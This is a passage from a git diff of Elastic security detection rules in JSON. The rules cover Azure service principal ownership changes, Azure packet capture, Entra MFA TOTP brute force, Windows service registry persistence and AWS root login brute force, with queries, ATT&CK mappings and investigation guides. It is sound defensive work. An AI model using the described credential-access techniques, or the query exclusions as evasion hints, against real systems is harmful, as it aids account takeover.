access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "User Added as Owner for Azure Service Principal", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating User Added as Owner for Azure Service Principal\n\nAzure service principals are crucial for managing application permissions within a tenant, defining access and capabilities. Adversaries may exploit this by adding themselves as owners, gaining control over application permissions and access. The detection rule monitors audit logs for successful owner additions, flagging potential unauthorized changes to maintain security integrity.\n\n### Possible investigation steps\n\n- Review the audit log entry to confirm the event dataset is 'azure.auditlogs' and the operation name is \"Add owner to service principal\" with a successful outcome.\n- Identify the user account that was added as an owner and gather information about this account, including recent activity and any associated alerts.\n- Determine the service principal involved by reviewing its details, such as the application it is associated with and the permissions it holds.\n- Check the history of changes to the service principal to identify any other recent modifications or suspicious activities.\n- Investigate the context and necessity of the ownership change by contacting the user or team responsible for the service principal to verify if the change was authorized.\n- Assess the potential impact of the ownership change on the tenant's security posture, considering the permissions and access granted to the service principal.\n\n### False positive analysis\n\n- Routine administrative changes may trigger alerts when legitimate IT staff add themselves or others as owners for maintenance purposes. To manage this, create exceptions for known administrative accounts that frequently perform these actions.\n- Automated processes or scripts that manage service principal ownership as part of regular operations can cause false positives. Identify and document these processes, then exclude them from triggering alerts by using specific identifiers or tags.\n- Organizational changes, such as team restructuring, might lead to multiple legitimate ownership changes. During these periods, temporarily adjust the rule sensitivity or create temporary exceptions for specific user groups involved in the transition.\n- Third-party applications that require ownership changes for integration purposes can also trigger alerts. Verify these applications and whitelist their associated service principal changes to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately revoke the added user's ownership from the Azure service principal to prevent unauthorized access and control.\n- Conduct a thorough review of the affected service principal's permissions and access logs to identify any unauthorized changes or access attempts.\n- Reset credentials and update any secrets or keys associated with the compromised service principal to mitigate potential misuse.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement conditional access policies to restrict who can add owners to service principals, ensuring only authorized personnel have this capability.\n- Enhance monitoring and alerting for similar activities by increasing the sensitivity of alerts related to changes in service principal ownership.\n- Document the incident and response actions taken to improve future incident response and refine security policies.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to service principal\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json index 5ec57f63c64..674cfa6083b 100644 --- a/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json @@ -26,6 +26,13 @@ "https://www.sentinelone.com/labs/exploring-fbot-python-based-malware-targeting-cloud-and-payment-services/", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 21, "rule_id": "393ef120-63d1-11ef-8e38-f661ea17fbce", "severity": "low", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json deleted file mode 100644 index 31139baa28d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "false_positives": [ - "Full Network Packet Capture may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Full Network Packet Capture from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Full Network Packet Capture Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Full Network Packet Capture Detected\n\nAzure's Packet Capture is a feature of Network Watcher that allows for the inspection of network traffic, useful for diagnosing network issues. However, if misused, it can capture sensitive data from unencrypted traffic, posing a security risk. Adversaries might exploit this to access credentials or other sensitive information. The detection rule identifies suspicious packet capture activities by monitoring specific Azure activity logs for successful operations, helping to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific user or service principal associated with the packet capture operation by examining the `azure.activitylogs.operation_name` and `event.dataset` fields.\n- Check the timestamp of the detected packet capture activity to determine the exact time frame of the event and correlate it with any other suspicious activities or changes in the environment.\n- Investigate the source and destination IP addresses involved in the packet capture to understand the scope and potential impact, focusing on any unencrypted traffic that might have been captured.\n- Verify the legitimacy of the packet capture request by contacting the user or team responsible for the operation to confirm if it was authorized and necessary for troubleshooting or other legitimate purposes.\n- Assess the risk of exposed sensitive data by identifying any critical systems or services that were part of the captured network traffic, especially those handling credentials or personal information.\n\n### False positive analysis\n\n- Routine network diagnostics by authorized personnel can trigger the rule. To manage this, create exceptions for specific user accounts or IP addresses known to perform regular diagnostics.\n- Automated network monitoring tools might initiate packet captures as part of their normal operations. Identify these tools and exclude their activities from triggering alerts.\n- Scheduled maintenance activities often involve packet captures for performance analysis. Document these schedules and configure the rule to ignore captures during these periods.\n- Development and testing environments may frequently use packet capture for debugging purposes. Exclude these environments by filtering based on resource tags or environment identifiers.\n- Legitimate security audits may involve packet capture to assess network security. Coordinate with the audit team to whitelist their activities during the audit period.\n\n### Response and remediation\n\n- Immediately isolate the affected network segment to prevent further unauthorized packet capture and potential data exfiltration.\n- Revoke any suspicious or unauthorized access to Azure Network Watcher and related resources to prevent further misuse.\n- Conduct a thorough review of the captured network traffic logs to identify any sensitive data exposure and assess the potential impact.\n- Reset credentials and access tokens for any accounts or services that may have been compromised due to exposed unencrypted traffic.\n- Implement network encryption protocols to protect sensitive data in transit and reduce the risk of future packet capture exploitation.\n- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary.\n- Enhance monitoring and alerting for Azure Network Watcher activities to detect and respond to similar threats more effectively in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION or\n MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION or\n MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\n ) and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1040", - "name": "Network Sniffing", - "reference": "https://attack.mitre.org/techniques/T1040/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 104 - }, - "id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json deleted file mode 100644 index 1eda6e4a39b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json +++ /dev/null @@ -1,66 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span. Adversaries with valid credentials, when attempting to login to Azure portal or other Azure services, may be prompted to provide a TOTP code as part of the MFA process. If successful, adversaries can bypass MFA and gain unauthorized access to Azure resources.", - "false_positives": [ - "Based on the high-frequency threshold, it would be unlikely for a legitimate user to exceed the threshold for failed TOTP code attempts in a short time-span." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Azure Entra MFA TOTP Brute Force Attempts", - "note": "## Triage and analysis\n\n### Investigating Azure Entra MFA TOTP Brute Force Attempts\n\nThis rule detects high-frequency failed TOTP code attempts for a single user in a short time span. Such behavior could indicate an adversary attempting to bypass multi-factor authentication (MFA) protections using valid credentials. Understanding the context of the user's typical behavior and identifying anomalies in the log data are critical to determining the nature of the activity.\n\n#### Possible Investigation Steps:\n\n**Review the Source IP Address**:\n - Check the `source.ip` or `azure.signinlogs.caller_ip_address` field.\n - Determine if the IP address is associated with the user\u2019s typical login locations.\n - Look for unusual geographic patterns or anomalous IP addresses (e.g., proxies, VPNs, or locations outside the user\u2019s normal activity).\n\n**Analyze User Activity**:\n - Identify the user from the `azure.signinlogs.properties.sign_in_identifier` field.\n - Determine if the user is currently active from another device or session. Session hijacking could explain parallel activity with failed attempts.\n - Review past logs for the user to determine whether MFA failures or other anomalies are consistent or new.\n\n**Inspect the Authentication Method**:\n - Evaluate the `azure.signinlogs.properties.mfa_detail.auth_method` field: `OATH verification code`.\n - Confirm if the user typically uses TOTP codes or another MFA method (e.g., push notifications).\n - Verify if there are any recent changes to the user\u2019s MFA settings that may explain multiple failed attempts.\n\n**Evaluate the User Agent**:\n - Check the `user_agent.original` field.\n - Identify if the user agent matches a typical browser or a potentially malicious script (e.g., Python-based).\n - Look for deviations in operating system or browser versions from the user\u2019s normal activity.\n\n**Analyze Conditional Access Policies**:\n - Review the `azure.signinlogs.properties.applied_conditional_access_policies` for enforced grant controls.\n - Verify if MFA failures are tied to legitimate security policies (`display_name: Require multifactor authentication for admins`).\n\n**Correlate with Other Events**:\n - Search for other authentication attempts involving the same `azure.signinlogs.caller_ip_address`, `user_principal_name`, or `azure.signinlogs.properties.app_id`.\n - Look for suspicious activity patterns, such as password resets, privilege escalation, or account lockouts.\n\n\n#### False Positive Analysis:\n\n- **Unintentional User Behavior**:\n - Verify if the failed attempts could result from the user\u2019s unfamiliarity with TOTP codes or issues with device synchronization.\n - Check if the user recently switched MFA methods or devices, which could explain multiple failures.\n - Determine if this is whitebox testing or a developer testing MFA integration.\n\n- **Administrative Actions**:\n - Determine if the activity is related to legitimate administrative testing or configuration changes in the MFA system.\n\n#### Response and Remediation:\n\n- **Immediate Actions**:\n - If proven malicious, lock the affected account temporarily to prevent further unauthorized attempts.\n - Notify the user of suspicious activity and validate their access to the account.\n - Reset passwords and MFA settings for the affected user to prevent unauthorized access while communicating with the user.\n\n- **Strengthen Authentication Policies**:\n - Ensure conditional access policies are configured to monitor and restrict anomalous login behavior.\n - Consider a different MFA method or additional security controls to prevent future bypass attempts.\n\n- **Monitor and Audit**:\n - Implement additional monitoring to track high-frequency authentication failures across the environment.\n - Audit historical logs for similar patterns involving other accounts to identify broader threats.\n\n- **Educate and Train Users**:\n - Provide guidance on the secure use of MFA and the importance of recognizing and reporting suspicious activity.\n", - "query": "from logs-azure.signinlogs* metadata _id, _version, _index\n| where\n // filter for Entra Sign-In Logs\n event.dataset == \"azure.signinlogs\"\n and azure.signinlogs.operation_name == \"Sign-in activity\"\n\n // filter for MFA attempts with OATH conditional access attempts or TOTP\n and azure.signinlogs.properties.authentication_requirement == \"multiFactorAuthentication\"\n and azure.signinlogs.properties.mfa_detail.auth_method == \"OATH verification code\"\n\n // filter on failures only from brute-force attempts\n and azure.signinlogs.properties.conditional_access_status == \"failure\"\n and azure.signinlogs.result_description == \"Authentication failed during strong authentication request.\"\n| keep azure.signinlogs.properties.sign_in_identifier\n| stats\n // aggregate by the sign-in account or principal\n failed_totp_code_attempts = count(*) by azure.signinlogs.properties.sign_in_identifier\n| where\n // filter on high frequency for a single user\n failed_totp_code_attempts > 30\n", - "references": [ - "https://www.oasis.security/resources/blog/oasis-security-research-team-discovers-microsoft-azure-mfa-bypass", - "https://learn.microsoft.com/en-us/entra/identity/", - "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins" - ], - "risk_score": 47, - "rule_id": "3fac01b2-b811-11ef-b25b-f661ea17fbce", - "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "3fac01b2-b811-11ef-b25b-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json index b06eed2e6d6..54cd168d1a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json @@ -18,6 +18,12 @@ "https://learn.microsoft.com/en-us/entra/identity/", "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "3fac01b2-b811-11ef-b25b-f661ea17fbce", "setup": "#### Required Entra ID Sign-In Logs\nThis rule requires the Entra ID sign-in logs via the Azure integration be enabled. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Entra ID logs integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json new file mode 100644 index 00000000000..c473612c398 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Persistence via Services Registry\n\nWindows services are crucial for running background processes. Adversaries may exploit this by directly altering service registry keys to maintain persistence, bypassing standard APIs. The detection rule identifies such anomalies by monitoring changes to specific registry paths and filtering out legitimate processes, thus highlighting potential unauthorized service modifications indicative of malicious activity.\n\n### Possible investigation steps\n\n- Review the specific registry paths and values that triggered the alert, focusing on \"ServiceDLL\" and \"ImagePath\" within the specified registry paths to identify any unauthorized or suspicious modifications.\n- Examine the process responsible for the registry change, paying attention to the process name and executable path, to determine if it is a known legitimate process or potentially malicious.\n- Cross-reference the process executable path against the list of known legitimate paths excluded in the query to ensure it is not a false positive.\n- Investigate the historical behavior of the process and any associated files or network activity to identify patterns indicative of malicious intent or persistence mechanisms.\n- Check for any recent changes or anomalies in the system's service configurations that could correlate with the registry modifications, indicating potential unauthorized service creation or alteration.\n- Consult threat intelligence sources or databases to determine if the process or registry changes are associated with known malware or adversary techniques.\n\n### False positive analysis\n\n- Legitimate software installations or updates may modify service registry keys directly. Users can create exceptions for known software update processes by excluding their executables from the detection rule.\n- System maintenance tools like Process Explorer may trigger false positives when they interact with service registry keys. Exclude these tools by adding their process names and paths to the exception list.\n- Drivers installed by trusted hardware peripherals might alter service registry keys. Users should identify and exclude these driver paths if they are known to be safe and frequently updated.\n- Custom enterprise applications that require direct registry modifications for service management can be excluded by specifying their executable paths in the rule exceptions.\n- Regular system processes such as svchost.exe or services.exe are already excluded, but ensure any custom scripts or automation tools that mimic these processes are also accounted for in the exceptions.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any suspicious processes identified in the alert that are not part of legitimate applications or services.\n- Restore the modified registry keys to their original state using a known good backup or by manually correcting the entries to ensure the integrity of the service configurations.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or artifacts.\n- Review and update endpoint protection policies to ensure that similar unauthorized registry modifications are detected and blocked in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n- Document the incident details, including the steps taken for containment and remediation, to enhance future response efforts and update threat intelligence databases.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.data.strings != null and registry.value : (\"ServiceDLL\", \"ImagePath\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"\\\\??\\\\?:\\\\Windows\\\\syswow64\\\\*.sys\",\n \"system32\\\\DRIVERS\\\\USBSTOR\", \n \"system32\\\\drivers\\\\*.sys\", \n \"C:\\\\WindowsAzure\\\\GuestAgent*.exe\", \n \"\\\"C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\*\", \n \"C:\\\\Program Files (x86)\\\\VERITAS\\\\VxPBX\\\\bin\\\\pbx_exchange.exe\", \n \"\\\"C:\\\\Program Files (x86)\\\\VERITAS\\\\VxPBX\\\\bin\\\\pbx_exchange.exe\\\"\",\n \"\\\"C:\\\\ProgramData\\\\McAfee\\\\Agent\\\\Current\\\\*\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\",\n \"?:\\\\Windows\\\\System32\\\\WaaSMedicAgent.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\WaaSMedicAgent.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 315 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_315", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json new file mode 100644 index 00000000000..ff8be22129c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "cloud.account.id" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Management Console Brute Force of Root User Identity", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Management Console Brute Force of Root User Identity\n\nThe AWS Management Console provides a web interface for managing AWS resources. Because the root user has unrestricted privileges, repeated failed console login attempts targeting this identity represent a high-risk credential access event. Even if no login succeeded, this activity may indicate reconnaissance, password spraying, or credential stuffing attempts targeting the root user.\n\nThis rule uses a threshold rule that detects a high number of failed `ConsoleLogin` events (`event.outcom: failure` with `userIdentity.type: Root`) within a short timeframe from the same IP address or user agent. \nThreshold rules only summarize grouped field values, so analysts must use timeline to review the actual events that triggered the alert.\n\n#### Possible investigation steps\n\n- **Review in Timeline.** \n Open the alert and *Investigate in timeline* to view the individual CloudTrail events contributing to the threshold alert. Review: \n - `source.ip`, `user_agent.original`, `geo fields` and `@timestamp` for each failure. \n - Look for patterns such as distributed sources or repeated retries at consistent intervals. \n - Look for any corresponding successful `ConsoleLogin` events around the same timeframe from the same IP or agent.\n\n- **Assess IP reputation and geolocation.** \n Use IP intelligence tools to evaluate whether the source addresses belong to known cloud providers, TOR nodes, or foreign regions outside your normal operations. \n - Correlate against `cloud.region` and `geo fields` and compare with expected login locations for your organization.\n\n- **Check for related activity.** \n Review CloudTrail for other API calls from the same source IP (for example, `GetSessionToken`, `AssumeRole`, or `ListUsers`) that may indicate scripted credential testing or discovery.\n\n- **Correlate with GuardDuty findings.** \n GuardDuty may raise complementary findings for anomalous console login behavior or brute force attempts. Review recent GuardDuty and AWS Config alerts for the same timeframe.\n\n- **Determine business context.** \n Confirm whether the source IPs are internal (for example, corporate VPN, IT admin network) or part of legitimate red-team or third-party testing. If uncertain, treat as suspicious.\n\n### False positive analysis\n\n- **Forgotten or mistyped credentials.** \n Repeated failed logins from known internal IPs could indicate a legitimate user typing errors. Validate by checking if a successful root login followed soon after. \n- **Automation or scanners.** \n Misconfigured monitoring tools or old browser sessions attempting to reuse cached credentials may trigger this rule. \n- **Planned penetration testing.** \n Red-team or security testing activities can generate deliberate brute force attempts. Verify via ticketing or testing schedules.\n\n### Response and remediation\n\n> The AWS Incident Response Playbooks classify root login attempts as Priority-1 credential compromise events. \n> Follow these steps whether or not your organization has a formal IR team.\n\n**1. Immediate containment**\n- **Check for success.** \n After pivoting to Timeline, confirm whether any `ConsoleLogin` events from the same IP or user agent show `event.oucome: success`. \n - If a successful login occurred, immediately follow the *AWS Management Console Root Login* rule investigation guide. \n- **Rotate the root password.** \n Use AWS\u2019s password reset function to set a strong, unique password stored in an offline vault. \n- **Enable or verify Multi-Factor Authentication (MFA)** on the root account. If MFA was already configured, review the device registration for changes or suspicious resets. \n- **Block offending IPs or networks.** \n Use AWS WAF, VPC network ACLs, or Security Groups to temporarily block the IPs used in the failed attempts. \n- **Alert internal teams.** \n Notify your security operations or cloud governance teams of the brute force pattern and actions taken.\n\n**2. Evidence preservation**\n- Export all failed `ConsoleLogin` events visible in Timeline (\u00b130 minutes around the alert window) to a restricted evidence bucket. \n- Preserve GuardDuty findings, AWS Config history, and CloudTrail logs for the same timeframe for further analysis.\n\n**3. Scoping and investigation**\n- Query CloudTrail across other AWS accounts and regions for additional failed or successful `ConsoleLogin` events from the same IPs. \n- Check IAM activity for simultaneous key creation, role modifications, or new users \u2014 signs of lateral or parallel intrusion attempts. \n- Review network telemetry (VPC Flow Logs, CloudFront, WAF) to determine whether the activity originated from a distributed or scripted attack pattern.\n\n**4. Recovery and hardening**\n- Confirm MFA is enabled and enforced on the root account. \n- Remove any root access keys (none should exist under normal security posture). \n- Enable organization-wide CloudTrail, GuardDuty, and Security Hub across all regions. \n- Set up real-time alerts for any future `ConsoleLogin` failures from the root user exceeding expected baselines. \n- Store root credentials offline with dual-custody and document controlled access procedures.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks):** See \u201cCredential Compromise\u201d and \u201cAccount 